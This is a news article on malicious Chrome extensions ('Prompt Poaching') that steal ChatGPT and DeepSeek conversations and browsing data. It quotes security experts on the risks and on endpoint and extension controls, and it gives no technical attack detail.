Artificial intelligence chatbots can answer queries, making them a powerful research tool. However, cybersecurity researchers warned this week that two malicious extensions had been discovered on the Chrome Web Store. Each was designed to exfiltrate OpenAI ChatGPT and DeepSeek conversations and browsing data to servers the attackers control.
The warnings follow another discovery that Urban VPN Proxy, which can be installed as an extension in Google Chrome and Microsoft Edge, was also spying on queries to AI chatbots.
Prompt Poaching
Researchers at Secure Annex, who have tracked this alarming trend, have named the tactic of using extensions to capture AI chatbot conversations “Prompt Poaching.”
According to the researchers, it is “growing in popularity,” whereby “extensions capture and exfiltrate conversations you have with AI.”
Hackers and other cybercriminals are using malicious code to enable monitoring of conversations with chatbots.
“It is clear prompt poaching has arrived to capture your most sensitive conversations and browser extensions are the exploit vector,” the Secure Annex researchers warned. “Many of these extensions have been previously identified for their clickstream tracking capabilities, but the collection of private chats dramatically escalates the invasive nature of these applications.”
Add-ons Impersonating Legitimate Extensions
What makes this type of cyberattack especially insidious is that the malicious browser add-ons are impersonating legitimate extensions.
“Once installed, the rogue extensions request that users grant them permissions to collect anonymized browser behavior to purportedly improve the sidebar experience,” The Hacker News reported. “Should the user agree to the practice, the embedded malware begins to harvest information about open browser tabs and chatbot conversation data.”
The add-ons aren’t limited to exfiltrating data shared with chatbots; they can also capture web browsing activity, including search queries and internal corporate URLs.
A New AI Chatbot Danger
We shouldn’t be surprised that malicious Chrome extensions are targeting AI platforms like ChatGPT and DeepSeek.
It was really a matter of time, warned Ensar Seker, chief information security officer at cybersecurity provider SOCRadar.
“Unfortunately, this is expected, and it’s just the beginning. Any platform that processes sensitive, high-value, or proprietary data becomes a prime target for adversaries,” Seker told ClearanceJobs.
“In this case, large language models (LLMs) are being used not only for productivity, but also to draft code, summarize confidential emails, or even assist with legal and financial analysis,” Seker added. “That makes the data flowing through these sessions incredibly valuable for threat actors.”
Chrome Extensions Are an Easy Target
Chrome extensions, especially those with broad permissions, have long been exploited to exfiltrate data. This campaign is the latest example of adversaries shifting tactics to compromise users’ browsers before data reaches OpenAI or DeepSeek’s infrastructure.
“Whenever a new piece of technology emerges, the same patterns tend to repeat. First, we make familiar security mistakes, such as adding access controls late and in a cumbersome way. Second, existing threats get dusted off and rebranded with a new, flashy name because it sells,” added Martin Jartelius, AI product director at Outpost24.
Jartelius told ClearanceJobs that such information stealers have been around for years.
“There is nothing new about them. They are not hacking AI platforms. Users install them because they appear convenient, willingly hand over sensitive data, whether banking details, passwords, personal information, or even chat histories with LLMs, and then feel ‘hacked,'” explained Jartelius. “In the early days of computer viruses, this was a common distribution method, and it remains one of the primary channels for malware today.”
Not Entirely an AI Issue
Jartelius further told ClearanceJobs that we should avoid framing this as an AI issue, noting that the only real connection to AI is that criminals recognize the value of these conversations.
He said the more important takeaway is what this behavior reveals.
“Users are uploading information worth stealing to third-party services at scale,” Jartelius suggested. “If criminals are willing to invest effort to steal it, that information is already being shared openly and in far greater volumes than most people realize.”
This is unrelated to AI platforms being compromised, as no AI provider has been hacked.
“The real issue is that users continue to install browser plugins without considering the risks and then act surprised when those plugins do more than expected,” Jartelius cautioned.
However, that doesn’t mean people shouldn’t be cautious about how they use AI platforms. As with all other aspects of our digital world, someone may be watching without the user’s awareness.
“Users should treat conversations with LLMs as they would with email or a cloud drive,” said Seker. “Everything you enter could be compromised if your browser is infected or if endpoint controls are weak.”
We’re just at the dawn of “prompt-jacking” and “LLM session hijacking” becoming new attack vectors.
“Enterprises need to consider how they’re using AI tools internally and externally: what policies are in place, what browser extensions are whitelisted, and whether zero trust is enforced at the endpoint level,” Seker suggested. “This attack reinforces that security around AI tooling isn’t just about model safety, it’s about user and session-layer security too.”


